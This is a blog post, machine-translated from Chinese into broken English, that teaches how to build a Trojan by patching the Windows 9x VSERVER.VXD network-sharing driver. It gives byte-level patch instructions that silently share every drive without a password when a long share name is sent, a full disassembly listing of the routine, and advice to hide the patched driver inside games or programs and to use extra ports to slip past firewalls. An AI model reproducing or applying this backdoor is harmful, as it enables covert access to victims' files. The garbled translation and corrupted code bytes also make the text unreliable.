Pages

Jumat, 11 November 2011

Trojan teach you to do

网上木马程序很流行,其实说来也很简单,大致都是修改注册表或者INI文件加载一个文件提供服务,这就手工都很容易检测出木马来。 Trojans are very popular online, in fact, very simple to say, are generally modify the registry or INI file to load a file to provide services, which are easy to detect Trojans hand to. 一,看增加的不明服务。 First, look at the increase in service is unknown. 二,因为木马是作为服务一般要打开一个网络通信端口,所以检查增加的服务端口也很容易检查出木马程序来。 Second, because the Trojans as a service to open a general network communication port, so check the increase of the service port is also very easy to check out the Trojan program. 其实完全可以稍微改动操作系统内核而作出一个很好的木马来,这样不用改动注册表也可以让用户很不容易发觉。 In fact, little changes can make the operating system kernel to a good horse, so do not change the registry also allows users to very easily found.

下面就是简单改动一个驱动程序做一个木马的方法。 Here is a driver to do simple changes to a Trojan horse approach. 大家可以分析别的驱动程序相应的作出自己的木马来。 We can analyze the corresponding other drivers to make their own horse. 这儿是利用WINDOWS的共享和远程管理。 Here is the use of WINDOWS sharing and remote management. WINDOWS的共享如果共享名是ADMIN$就可以远程管理,就是登陆ADMIN$进去了后所有的盘都完全共享为盘符加$.下面一段就是VSERVER。 WINDOWS share if the name is ADMIN $ share on remote management, that is, after landing ADMIN $ into a full share of all the plates for the drive letter plus $ The following section is VSERVER. VXD 处理共享的一段程序,SUB_0027校验密码,密码对了后后面检测共享名是ADMIN $否,是就看C$,D$...共享没有(DATA_0431==0?),没共享就调用SUB_0230共享,SUB_0230 一个参数就是密码指针,如果密码指针为0就没密码。 VXD a program dealing with shared, SUB_0027 check the password, the password behind the detection of post-ADMIN $ share name is not, is to look at C $, D $ ... shares not (DATA_0431 == 0?), Did not share the call SUB_0230 share, SUB_0230 a password parameter is a pointer, the pointer is 0 if the password is no password. 这儿为了好改动就用的这个参数。 Changes to good use here on this parameter. 显然我们就可以必要的时候调用SUB_0230 Obviously we can call SUB_0230 when necessary
就开了个后门。 It opened a back door. LOC_0415是检测网络通信的共享名串大于0DH否(包括串后的0),是就转LOC_0419出错返回,显然我们可以利用这儿去调用SUB_0230. 看LOC_0419 有7个字节可以利用,可以安排CALL SUB_0230 LOC_0415 is to test the network share name to communicate whether the string is greater than 0DH (including the string after the 0), is to turn LOC_0419 error return, obviously we can use here to call SUB_0230. See LOC_0419 seven bytes can be used, can be arranged CALL SUB_0230
NEW_LOC_0418 POP eax NEW_LOC_0418 POP eax
jmp 03469 jmp 03469
刚好7个字节。 Just 7 bytes. 3436: JE LOC_0418 是没找到要共享的目录跳转到LOC_0418 显然要改动,改动成JE NEW_LOC_0418 就可以。 3436: JE LOC_0418 is not to find the directory you want to share to jump to LOC_0418 obviously change, change into JE NEW_LOC_0418 can. 现在是LOC_0415一段要跳转到LOC_0419前要PUSH 0以调用SUB_0230。 It is LOC_0415 period before jumping to LOC_0419 PUSH 0 to call SUB_0230.
下面是LOC_0415的改法: Here is LOC_0415 the reform law:

LOC_0415: LOC_0415:

03415 XOR EAX,EAX ;2 字节,同样SUB AL,AL 得到AL=0;还得到EAX=0。 03415 XOR EAX, EAX; 2 bytes, the same SUB AL, AL to get AL = 0; also get EAX = 0.
03417 PUSH EAX ;1 字节调用SUB_0230 用的DWORD参数0; 03417 PUSH EAX; 1 byte DWORD parameter called SUB_0230 with 0;
03418 XOR ECX,ECX ;2 字节ECX=0; 03418 XOR ECX, ECX; 2 bytes ECX = 0;
0341A DEC ECX ;1 字节得到ECX=0FFFFFFFFH这儿与MOV ECX,0FFFFH一样但字节数少 0341A DEC ECX; 1 byte to be ECX = 0FFFFFFFFH here and MOV ECX, 0FFFFH less the same but the number of bytes
0341B mov edi,ebx ;2 bytes 0341B mov edi, ebx; 2 bytes
0341D repne scasb ;2 bytes 0341D repne scasb; 2 bytes
0341F SUB EDI,EBX ;2 bytes get the share name long 0341F SUB EDI, EBX; 2 bytes get the share name long
03421 CMP EDI, 0Dh ;3 bytes大于等于0DH跳转。 03421 CMP EDI, 0Dh; 3 bytes than or equal to 0DH jump. 这儿条件可以改动为等于多少跳转等。 Here is equal to the number of conditions can change skipping.
03424 ja short loc_0419 ; 2 byte 03424 ja short loc_0419; 2 byte
03426 POP EAX ;1 byte 堆栈平衡 03426 POP EAX; 1 byte stack balance
03427 PUSH EDI ;1 byte 03427 PUSH EDI; 1 byte
03428 POP EAX ;1 byte EAX=EDI SHARE NAME LONG , 后面要用 03428 POP EAX; 1 byte EAX = EDI SHARE NAME LONG, use the back

刚好字节够用,注意DATA_0182 那儿有重定位那种字节不能简单改动。 Just enough bytes, note that there have DATA_0182 byte relocation can not be that simple changes. 你可以把你的好的程序好的游戏加上一小段代码这么改动他的VSERVER。 You can put your good program with good short game to change the code so he VSERVER. VXD文件,最好是硬盘的WINDOWS安装目录打包文件里面的VSERVER。 VXD file, it is best to drive the WINDOWS installation directory the file packaged inside VSERVER. VXD也改动,还有访问共享目录\\IP的139端口也最好加一个别的端口以逃避有些路由器防火墙的设置,再把你的程序散发。 VXD also changes, as well as access to a shared directory \ \ IP port 139 is also best to add a port to avoid some of the other router firewall settings, and then distribute your application. 。 . 。 . 。 . 。 .

中了你的木马的你访问他的共享目录后面加一大串字母(共享名串长大于等于0DH)会提示出错,但你就可以再访问\\IP\C$, \\IP\D$....了,这可是完全共享的了.如果你先没有那个一大串字母的访问他也没有设置远程管理的话\\IP\C$,\\IP\D$... 都不能访问的,他自己用网络监视器也看不到这种共享的,所以很不容易觉察的。 Trojan horse in your shared directory you access to his long list of letters followed by (name string grew up in equal share 0DH) will prompt an error, but you can no longer access the \ \ IP \ C $, \ \ IP \ D $ ...., and this is completely shared in. If you do not have that long list of letters before he did not set up remote access management, then \ \ IP \ C $, \ \ IP \ D $ ... can not access his own use Network Monitor can not see this shared, so not easy aware of. 注意你进入共享目录了网络监视器还是能看到。 Note you into the shared directory or a network monitor to see.




;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 ; Paipaipaipai Paipaipaipai Paipaipaipai Paipaipaipai Paipaipaipai Paipaipaipai Paipaipaipai Paipaipaipai Paipaipaipai piperazine
; SUBROUTINE ; SUBROUTINE
; ;
; Called from: 031FD, 32CC ; Called from: 031FD, 32CC
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 ; Qingqingqingqing Qingqingqingqing Qingqingqingqing Qingqingqingqing Qingqingqingqing Qingqingqingqing Qingqingqingqing Qingqingqingqing Qingqingqingqing velvetleaf

033F4 sub_0026 proc near 033F4 sub_0026 proc near
033F4 56 push esi 033F4 56 push esi
033F5 66| 81 3B 5C5C cmp word ptr [ebx],5C5Ch 033F5 66 | 81 3B 5C5C cmp word ptr [ebx], 5C5Ch
033FA 74 07 je short loc_0412 ; Jump if equal 033FA 74 07 je short loc_0412; Jump if equal
033FC 66| 81 3B 2F2F cmp word ptr [ebx],2F2Fh 033FC 66 | 81 3B 2F2F cmp word ptr [ebx], 2F2Fh
03401 75 12 jne short loc_0415 ; Jump if not equal 03401 75 12 jne short loc_0415; Jump if not equal
03403 loc_0412: ; xref 033FA 03403 loc_0412:; xref 033FA
03403 8D 73 02 lea esi,dword ptr [ebx+2] ; Load effective addr 03403 8D 73 02 lea esi, dword ptr [ebx +2]; Load effective addr
03406 loc_0413: ; xref 0340F 03406 loc_0413:; xref 0340F
03406 E8 00006961 call sub_0207 ; (09D6C) 03406 E8 00006961 call sub_0207; (09D6C)
0340B 74 05 jz short loc_0414 ; Jump if zero 0340B 74 05 jz short loc_0414; Jump if zero
0340D 3C 5C cmp al,5Ch ; '\' 0340D 3C 5C cmp al, 5Ch; '\'
0340F 75 F5 jne loc_0413 ; Jump if not equal 0340F 75 F5 jne loc_0413; Jump if not equal
03411 46 inc esi 03411 46 inc esi
03412 loc_0414: ; xref 0340B 03412 loc_0414:; xref 0340B
03412 8D 5E FF lea ebx,dword ptr [esi-1] ; Load effective addr 03412 8D 5E FF lea ebx, dword ptr [esi-1]; Load effective addr
03415 loc_0415: ; xref 03401 03415 loc_0415:; xref 03401
03415 2A C0 sub al,al 03415 2A C0 sub al, al
03417 B9 0000FFFF mov ecx,0FFFFh 03417 B9 0000FFFF mov ecx, 0FFFFh
0341C 8B FB mov edi,ebx 0341C 8B FB mov edi, ebx
0341E F2/ AE repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al 0341E F2 / AE repne scasb; Rep zf = 0 + cx> 0 Scan es: [di] for al
03420 8B C7 mov eax,edi 03420 8B C7 mov eax, edi
03422 2B C3 sub eax,ebx 03422 2B C3 sub eax, ebx
03424 83 F8 0D cmp eax,0Dh 03424 83 F8 0D cmp eax, 0Dh
03427 77 26 ja short loc_0419 ; Jump if above 03427 77 26 ja short loc_0419; Jump if above
03429 55 push ebp 03429 55 push ebp
0342A 8B 2D 00011CA4 mov ebp,dword ptr data_0182 ;THE SHARE POINTER ; (11CA4=0) 0342A 8B 2D 00011CA4 mov ebp, dword ptr data_0182; THE SHARE POINTER; (11CA4 = 0)
03430 loc_0416: ; xref 0344C 03430 loc_0416:; xref 0344C
03430 ?1 FD 00011CA4 cmp ebp,11CA4h 03430? 1 FD 00011CA4 cmp ebp, 11CA4h
03436 74 16 je short loc_0418 ; Jump if equal 03436 74 16 je short loc_0418; Jump if equal
03438 80 7D 08 02 cmp byte ptr [ebp+ClientEBP],2 03438 80 7D 08 02 cmp byte ptr [ebp + ClientEBP], 2
0343C 75 0B jne short loc_0417 ; Jump if not equal 0343C 75 0B jne short loc_0417; Jump if not equal
0343E 8D 75 11 lea esi,dword ptr [ebp+11h] ; Load effective addr 0343E 8D 75 11 lea esi, dword ptr [ebp +11 h]; Load effective addr
03441 8B FB mov edi,ebx 03441 8B FB mov edi, ebx
03443 8B C8 mov ecx,eax 03443 8B C8 mov ecx, eax
03445 F3/ A6 repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] 03445 F3 / A6 repe cmpsb; Rep zf = 1 + cx> 0 Cmp [si] to es: [di]
03447 74 3A jz short loc_0424 ; Jump if zero 03447 74 3A jz short loc_0424; Jump if zero
03449 loc_0417: ; xref 0343C 03449 loc_0417:; xref 0343C
03449 8B 6D 00 mov ebp,dword ptr [ebp+ClientEDI] 03449 8B 6D 00 mov ebp, dword ptr [ebp + ClientEDI]
0344C EB E2 jmp short loc_0416 ; (03430) 0344C EB E2 jmp short loc_0416; (03430)
0344E loc_0418: ; xref 03436 0344E loc_0418:; xref 03436
0344E 5D pop ebp 0344E 5D pop ebp
0344F loc_0419: ; xref 03427 0344F loc_0419:; xref 03427
0344F B8 00060002 mov eax,60002h 0344F B8 00060002 mov eax, 60002h
03454 5E pop esi 03454 5E pop esi
03455 F9 stc ; Set carry flag 03455 F9 stc; Set carry flag
03456 C3 retn 03456 C3 retn
03457 loc_0420: ; xref 0349F 03457 loc_0420:; xref 0349F
03457 8B 43 34 mov eax,dword ptr [ebx+34h] 03457 8B 43 34 mov eax, dword ptr [ebx +34 h]
0345A 8B 1B mov ebx,[ebx] 0345A 8B 1B mov ebx, [ebx]
0345C 81 FB 00011CA4 cmp ebx,11CA4h 0345C 81 FB 00011CA4 cmp ebx, 11CA4h
03462 74 0A je short loc_0421 ; Jump if equal 03462 74 0A je short loc_0421; Jump if equal
03464 3B 43 34 cmp eax,dword ptr [ebx+34h] 03464 3B 43 34 cmp eax, dword ptr [ebx +34 h]
03467 74 2F je short loc_0425 ; Jump if equal 03467 74 2F je short loc_0425; Jump if equal
03469 B8 00020002 mov eax,20002h 03469 B8 00020002 mov eax, 20002h
0346E loc_0421: ; xref 03462, 3481, 354D, 35E8 0346E loc_0421:; xref 03462, 3481, 354D, 35E8
0346E ?E pop esi 0346E? E pop esi
0346F F9 stc ; Set carry flag 0346F F9 stc; Set carry flag
03470 C3 retn 03470 C3 retn
03471 33 DB db 33h,0DBh 03471 33 DB db 33h, 0DBh
03473 loc_0422: ; xref 0349D 03473 loc_0422:; xref 0349D
03473 5E pop esi 03473 5E pop esi
03474 C3 retn 03474 C3 retn
03475 loc_0423: ; xref 034C1 03475 loc_0423:; xref 034C1
03475 8B D3 mov edx,ebx 03475 8B D3 mov edx, ebx
03477 鶥B 0000000A mov ebx,0Ah ; (0000A=0B8h) 03477 Thrush B 0000000A mov ebx, 0Ah; (0000A = 0B8h)
0347C B8 00590002 mov eax,590002h 0347C B8 00590002 mov eax, 590002h
03481 EB EB jmp short loc_0421 ; (0346E) 03481 EB EB jmp short loc_0421; (0346E)
03483 loc_0424: ; xref 03447 03483 loc_0424:; xref 03447
03483 8B DD mov ebx,ebp 03483 8B DD mov ebx, ebp
03485 59 pop ecx ;ebp ,the password long 03485 59 pop ecx; ebp, the password long
03486 F6 05 00012446 01 test byte ptr data_0317,1 ; (12446=0) 03486 F6 05 00012446 01 test byte ptr data_0317, 1; (12446 = 0)
0348D 75 12 jnz short loc_0426 ; Jump if not zero 0348D 75 12 jnz short loc_0426; Jump if not zero
0348F 8B 34 24 mov esi,[esp] 0348F 8B 34 24 mov esi, [esp]
03492 F6 46 1F 01 test byte ptr [esi+1Fh],1 03492 F6 46 1F 01 test byte ptr [esi +1 Fh], 1
03496 75 09 jnz short loc_0426 ; Jump if not zero 03496 75 09 jnz short loc_0426; Jump if not zero
03498 loc_0425: ; xref 03467 03498 loc_0425:; xref 03467
03498 E8 00000182 call sub_0027 ; (0361F) check the password 03498 E8 00000182 call sub_0027; (0361F) check the password
0349D 72 D4 jc loc_0422 ; Jump if carry Set 0349D 72 D4 jc loc_0422; Jump if carry Set
0349F 75 B6 jnz loc_0420 ; Jump if not zero 0349F 75 B6 jnz loc_0420; Jump if not zero
034A1 loc_0426: ; xref 0348D, 3496 034A1 loc_0426:; xref 0348D, 3496
034A1 F6 43 10 40 test byte ptr [ebx+10h],40h ; '@' 034A1 F6 43 10 40 test byte ptr [ebx +10 h], 40h; '@'
034A5 0F 85 00000089 jnz loc_0433 ; Jump if not zero 034A5 0F 85 00000089 jnz loc_0433; Jump if not zero
034AB A1 00011CC4 mov eax,data_0190 ; (11CC4=0FFFFF000h) 034AB A1 00011CC4 mov eax, data_0190; (11CC4 = 0FFFFF000h)
034B0 80 38 01 cmp byte ptr [eax],1 034B0 80 38 01 cmp byte ptr [eax], 1
034B3 0F 83 00000134 jae loc_0439 ; Jump if above or = 034B3 0F 83 00000134 jae loc_0439; Jump if above or =
034B9 loc_0427: ; xref 0353B, 3564, 356F, 35F6 034B9 loc_0427:; xref 0353B, 3564, 356F, 35F6
; 3611 ; 3611
034B9 66| 8B 53 0E mov dx,word ptr [ebx+0Eh] 034B9 66 | 8B 53 0E mov dx, word ptr [ebx +0 Eh]
034BD 66| 39 53 0C cmp word ptr [ebx+0Ch],dx 034BD 66 | 39 53 0C cmp word ptr [ebx +0 Ch], dx
034C1 76 B2 jbe loc_0423 ; Jump if below or = 034C1 76 B2 jbe loc_0423; Jump if below or =
034C3 loc_0428: ; xref 03528 034C3 loc_0428:; xref 03528
034C3 8B 0D 00011B34 mov ecx,dword ptr data_0170 ; (11B34=0) 034C3 8B 0D 00011B34 mov ecx, dword ptr data_0170; (11B34 = 0)
034C9 85 C9 test ecx,ecx 034C9 85 C9 test ecx, ecx
034CB 74 56 jz short loc_0431 ; Jump if zero 034CB 74 56 jz short loc_0431; Jump if zero
034CD 8B 01 mov eax,[ecx] 034CD 8B 01 mov eax, [ecx]
034CF A3 00011B34 mov data_0170,eax ; (11B34=0) 034CF A3 00011B34 mov data_0170, eax; (11B34 = 0)
034D4 66| FF 43 0E inc word ptr [ebx+0Eh] 034D4 66 | FF 43 0E inc word ptr [ebx +0 Eh]
034D8 89 59 0C mov dword ptr [ecx+0Ch],ebx 034D8 89 59 0C mov dword ptr [ecx +0 Ch], ebx
034DB C6 41 14 03 mov byte ptr [ecx+14h],3 034DB C6 41 14 03 mov byte ptr [ecx +14 h], 3
034DF 8A 41 17 mov al,byte ptr [ecx+17h] 034DF 8A 41 17 mov al, byte ptr [ecx +17 h]
034E2 04 08 add al,8 034E2 04 08 add al, 8
034E4 0C C0 or al,0C0h 034E4 0C C0 or al, 0C0h
034E6 88 41 17 mov byte ptr [ecx+17h],al 034E6 88 41 17 mov byte ptr [ecx +17 h], al
034E9 C6 41 15 00 mov byte ptr [ecx+15h],0 034E9 C6 41 15 00 mov byte ptr [ecx +15 h], 0
034ED 8B 34 24 mov esi,[esp] 034ED 8B 34 24 mov esi, [esp]
034F0 F6 46 1F 08 test byte ptr [esi+1Fh],8 034F0 F6 46 1F 08 test byte ptr [esi +1 Fh], 8
034F4 75 08 jnz short loc_0429 ; Jump if not zero 034F4 75 08 jnz short loc_0429; Jump if not zero
034F6 A1 00011CC8 mov eax,data_0191 ; (11CC8=0FFFFF000h) 034F6 A1 00011CC8 mov eax, data_0191; (11CC8 = 0FFFFF000h)
034FB FF 40 10 inc dword ptr [eax+10h] 034FB FF 40 10 inc dword ptr [eax +10 h]
034FE loc_0429: ; xref 034F4 034FE loc_0429:; xref 034F4
034FE 5E pop esi 034FE 5E pop esi
034FF 81 7B 11 494D4441 cmp dword ptr [ebx+11h],494D4441h ;ADMIN$ ? 034FF 81 7B 11 494D4441 cmp dword ptr [ebx +11 h], 494D4441h; ADMIN $?
03506 75 0E jne short loc_0430 ; Jump if not equal 03506 75 0E jne short loc_0430; Jump if not equal
03508 66| 81 7B 15 244E cmp word ptr [ebx+15h],244Eh 03508 66 | 81 7B 15 244E cmp word ptr [ebx +15 h], 244Eh
0350E 75 06 jne short loc_0430 ; Jump if not equal 0350E 75 06 jne short loc_0430; Jump if not equal
03510 80 7B 17 00 cmp byte ptr [ebx+17h],0 03510 80 7B 17 00 cmp byte ptr [ebx +17 h], 0
03514 74 61 je short loc_0435 ; Jump if equal 03514 74 61 je short loc_0435; Jump if equal
03516 loc_0430: ; xref 03506, 350E, 3584 03516 loc_0430:; xref 03506, 350E, 3584
03516 B8 00011CD4 mov eax,11CD4h 03516 B8 00011CD4 mov eax, 11CD4h
0351B E8 000056BC call sub_0130 ; (08BDC) 0351B E8 000056BC call sub_0130; (08BDC)
03520 85 DB test ebx,ebx 03520 85 DB test ebx, ebx
03522 C3 retn 03522 C3 retn
03523 loc_0431: ; xref 034CB 03523 loc_0431:; xref 034CB
03523 E8 00000190 call sub_0028 ; (036B8) 03523 E8 00000190 call sub_0028; (036B8)
03528 73 99 jnc loc_0428 ; Jump if carry=0 03528 73 99 jnc loc_0428; Jump if carry = 0
0352A EB 00 jmp short loc_0432 ; (0352C) 0352A EB 00 jmp short loc_0432; (0352C)
0352C loc_0432: ; xref 0352A 0352C loc_0432:; xref 0352A
0352C 5F pop edi 0352C 5F pop edi
0352D B8 00590002 mov eax,590002h 0352D B8 00590002 mov eax, 590002h
03532 F9 stc ; Set carry flag 03532 F9 stc; Set carry flag
03533 C3 retn 03533 C3 retn
03534 loc_0433: ; xref 034A5 03534 loc_0433:; xref 034A5
03534 8B 34 24 mov esi,[esp] 03534 8B 34 24 mov esi, [esp]
03537 F6 46 1F 01 test byte ptr [esi+1Fh],1 03537 F6 46 1F 01 test byte ptr [esi +1 Fh], 1
0353B 0F 85 FFFFFF78 jnz loc_0427 ; Jump if not zero 0353B 0F 85 FFFFFF78 jnz loc_0427; Jump if not zero
03541 loc_0434: ; xref 03575, 358F 03541 loc_0434:; xref 03575, 358F
03541 ?B D3 mov edx,ebx 03541? B D3 mov edx, ebx
03543 BB 0000000B mov ebx,0Bh 03543 BB 0000000B mov ebx, 0Bh
03548 B8 00050001 mov eax,50001h 03548 B8 00050001 mov eax, 50001h
0354D E9 FFFFFF1C jmp loc_0421 ; (0346E) 0354D E9 FFFFFF1C jmp loc_0421; (0346E)
;* No entry point to code ; * No entry point to code
03552 8B 3C 24 mov edi,[esp] 03552 8B 3C 24 mov edi, [esp]
03555 53 push ebx 03555 53 push ebx
03556 8B 35 000128B8 mov esi,dword ptr data_0379 ; (128B8=0FFFFF000h) 03556 8B 35 000128B8 mov esi, dword ptr data_0379; (128B8 = 0FFFFF000h)
0355C E8 FFFFE407 call sub_0009 ; (01968) 0355C E8 FFFFE407 call sub_0009; (01968)
03561 5B pop ebx 03561 5B pop ebx
03562 0B ED or ebp,ebp ; Zero ? 03562 0B ED or ebp, ebp; Zero?
03564 0F 84 FFFFFF4F jz loc_0427 ; Jump if zero 03564 0F 84 FFFFFF4F jz loc_0427; Jump if zero
0356A 3E: 83 7D 10 00 cmp dword ptr ds:[ebp+ClientEBX],0 0356A 3E: 83 7D 10 00 cmp dword ptr ds: [ebp + ClientEBX], 0
0356F 0F 85 FFFFFF44 jne loc_0427 ; Jump if not equal 0356F 0F 85 FFFFFF44 jne loc_0427; Jump if not equal
03575 EB CA jmp short loc_0434 ; (03541) 03575 EB CA jmp short loc_0434; (03541)
03577 loc_0435: ; xref 03514 03577 loc_0435:; xref 03514
03577 F6 05 00012446 01 test byte ptr data_0317,1 ; (12446=0) 03577 F6 05 00012446 01 test byte ptr data_0317, 1; (12446 = 0)
0357E 74 11 jz short loc_0436 ; Jump if zero 0357E 74 11 jz short loc_0436; Jump if zero
03580 F6 46 1F 01 test byte ptr [esi+1Fh],1 03580 F6 46 1F 01 test byte ptr [esi +1 Fh], 1
03584 75 90 jnz loc_0430 ; NOT ADMIN$ Jump if not zero 03584 75 90 jnz loc_0430; NOT ADMIN $ Jump if not zero
03586 66| FF 4B 0E dec word ptr [ebx+0Eh] 03586 66 | FF 4B 0E dec word ptr [ebx +0 Eh]
0358A C6 41 14 00 mov byte ptr [ecx+14h],0 0358A C6 41 14 00 mov byte ptr [ecx +14 h], 0
0358E 56 push esi 0358E 56 push esi
0358F EB B0 jmp short loc_0434 ; (03541) 0358F EB B0 jmp short loc_0434; (03541)
03591 loc_0436: ; xref 0357E 03591 loc_0436:; xref 0357E
03591 80 4E 1F 01 or byte ptr [esi+1Fh],1 03591 80 4E 1F 01 or byte ptr [esi +1 Fh], 1
03595 C6 41 15 01 mov byte ptr [ecx+15h],1 03595 C6 41 15 01 mov byte ptr [ecx +15 h], 1
03599 8B FE mov edi,esi 03599 8B FE mov edi, esi

0359B 8B 35 000128B8 mov esi,dword ptr data_0379 ; (128B8=0FFFFF000h) 0359B 8B 35 000128B8 mov esi, dword ptr data_0379; (128B8 = 0FFFFF000h)
035A1 83 3D 000134E0 00 cmp dword ptr data_0431,0 ; C$,D$ HAVE BEEN SHARED(134E0=0) 035A1 83 3D 000134E0 00 cmp dword ptr data_0431, 0; C $, D $ HAVE BEEN SHARED (134E0 = 0)
035A8 75 14 jne short loc_0437 ; Jump if not equal 035A8 75 14 jne short loc_0437; Jump if not equal
035AA 52 push edx 035AA 52 push edx
035AB 51 push ecx 035AB 51 push ecx
035AC 8D 4B 1E lea ecx,dword ptr [ebx+1Eh];THE ADMIN$ PASSWORD 035AC 8D 4B 1E lea ecx, dword ptr [ebx +1 Eh]; THE ADMIN $ PASSWORD
035AF ?1 push ecx ; PARAMETER_1 if ecx=0 no password 035AF? 1 push ecx; PARAMETER_1 if ecx = 0 no password
035B0 E8 0000856F call sub_0230 ;MAKE C$,D$SHARE (0BB24) 035B0 E8 0000856F call sub_0230; MAKE C $, D $ SHARE (0BB24)
035B5 59 pop ecx 035B5 59 pop ecx
035B6 59 pop ecx 035B6 59 pop ecx
035B7 5A pop edx 035B7 5A pop edx
035B8 FF 05 000134E0 inc dword ptr data_0431 ; (134E0=0) 035B8 FF 05 000134E0 inc dword ptr data_0431; (134E0 = 0)
035BE loc_0437: ; xref 035A8 035BE loc_0437:; xref 035A8
035BE 53 push ebx 035BE 53 push ebx
035BF E8 FFFFE3A4 call sub_0009 ; (01968) 035BF E8 FFFFE3A4 call sub_0009; (01968)
035C4 72 13 jc short loc_0438 ; Jump if carry Set 035C4 72 13 jc short loc_0438; Jump if carry Set
035C6 8B 3D 00011CCC mov edi,dword ptr data_0192 ; (11CCC=0FFFFF000h) 035C6 8B 3D 00011CCC mov edi, dword ptr data_0192; (11CCC = 0FFFFF000h)
035CC 8B BF 000000E2 mov edi,dword ptr ds:[0E2h][edi] ; (000E2=358B0000h) 035CC 8B BF 000000E2 mov edi, dword ptr ds: [0E2h] [edi]; (000E2 = 358B0000h)
035D2 89 7B 04 mov dword ptr [ebx+4],edi 035D2 89 7B 04 mov dword ptr [ebx +4], edi
035D5 5B pop ebx 035D5 5B pop ebx
035D6 85 DB test ebx,ebx 035D6 85 DB test ebx, ebx
035D8 C3 retn 035D8 C3 retn
035D9 loc_0438: ; xref 035C4 035D9 loc_0438:; xref 035C4
035D9 5A pop edx 035D9 5A pop edx
035DA C6 41 14 00 mov byte ptr [ecx+14h],0 035DA C6 41 14 00 mov byte ptr [ecx +14 h], 0
035DE BB 0000000C mov ebx,0Ch 035DE BB 0000000C mov ebx, 0Ch
035E3 B8 00010002 mov eax,10002h 035E3 B8 00010002 mov eax, 10002h
035E8 E9 FFFFFE81 jmp loc_0421 ; (0346E) 035E8 E9 FFFFFE81 jmp loc_0421; (0346E)
035ED loc_0439: ; xref 034B3 035ED loc_0439:; xref 034B3
035ED 75 28 jnz short loc_0440 ; Jump if not zero 035ED 75 28 jnz short loc_0440; Jump if not zero
035EF 8B 34 24 mov esi,[esp] 035EF 8B 34 24 mov esi, [esp]
035F2 F6 46 1F 01 test byte ptr [esi+1Fh],1 035F2 F6 46 1F 01 test byte ptr [esi +1 Fh], 1
035F6 0F 85 FFFFFEBD jnz loc_0427 ; Jump if not zero 035F6 0F 85 FFFFFEBD jnz loc_0427; Jump if not zero
035FC 81 7B 11 494D4441 cmp dword ptr [ebx+11h],494D4441h 035FC 81 7B 11 494D4441 cmp dword ptr [ebx +11 h], 494D4441h
03603 75 12 jne short loc_0440 ; Jump if not equal 03603 75 12 jne short loc_0440; Jump if not equal
03605 66| 81 7B 15 244E cmp word ptr [ebx+15h],244Eh 03605 66 | 81 7B 15 244E cmp word ptr [ebx +15 h], 244Eh
0360B 75 0A jne short loc_0440 ; Jump if not equal 0360B 75 0A jne short loc_0440; Jump if not equal
0360D 80 7B 17 00 cmp byte ptr [ebx+17h],0 0360D 80 7B 17 00 cmp byte ptr [ebx +17 h], 0
03611 0F 84 FFFFFEA2 je loc_0427 ; Jump if equal 03611 0F 84 FFFFFEA 2 je loc_0427; Jump if equal
03617 loc_0440: ; xref 035ED, 3603, 360B 03617 loc_0440:; xref 035ED, 3603, 360B
03617 B8 00510002 mov eax,510002h 03617 B8 00510002 mov eax, 510002h
0361C 5F pop edi 0361C 5F pop edi
0361D F9 stc ; Set carry flag 0361D F9 stc; Set carry flag
0361E C3 retn 0361E C3 retn
sub_0026 endp sub_0026 endp
Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)